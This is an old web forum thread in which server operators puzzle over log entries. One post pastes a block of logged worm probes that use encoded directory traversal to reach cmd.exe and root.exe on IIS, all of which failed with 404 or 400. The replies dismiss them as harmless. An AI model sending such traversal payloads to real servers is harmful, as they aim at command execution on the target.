View previous topic :: View next topic |
Author |
Message |
mg66 -
Joined: 15 Aug 2004 Posts: 85 Location: USA, Illinois
|
|
Back to top |
|
|
TRUSTAbyss -
Joined: 29 Oct 2003 Posts: 3752 Location: USA, GA
|
Posted: Sat Aug 21, 2004 12:19 pm Post subject: |
|
|
Its a worm trying to hack into a IIS server lol , oh god thats funny
Dude , you have nothing to worry about , its a normal log file , see
the 404 part , that means its not found , have a nice day !
In the current beta you can choose what paths you can log , so you
can refuse to log requests from /_vti_bin/ , don't worry about it. |
|
Back to top |
|
|
senshi -
Joined: 05 Nov 2003 Posts: 385 Location: UK
|
Posted: Sat Aug 21, 2004 9:05 pm Post subject: |
|
|
LMAO
Just hope the poor bloke didnt lose his bottle. |
|
Back to top |
|
|
Drag0n -
Joined: 17 Feb 2004 Posts: 4
|
Posted: Tue Aug 24, 2004 5:34 am Post subject: |
|
|
hmm i got something similar to those...
are these also for IIS?
68.189.78.164 - - [23/Aug/2004:10:53:13 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
211.34.181.4 - - [22/Aug/2004:03:02:36 -0700] "GET /scripts/nsiislog.dll" 404 876 "" "" |
|
Back to top |
|
|
TRUSTAbyss -
Joined: 29 Oct 2003 Posts: 3752 Location: USA, GA
|
Posted: Tue Aug 24, 2004 6:25 am Post subject: |
|
|
Umm , yeah ! All of these are IIS attacks , in fact everything you see weird
in a log file is most likely an IIS attack , shows how much IIS sucks lol. |
|
Back to top |
|
|
|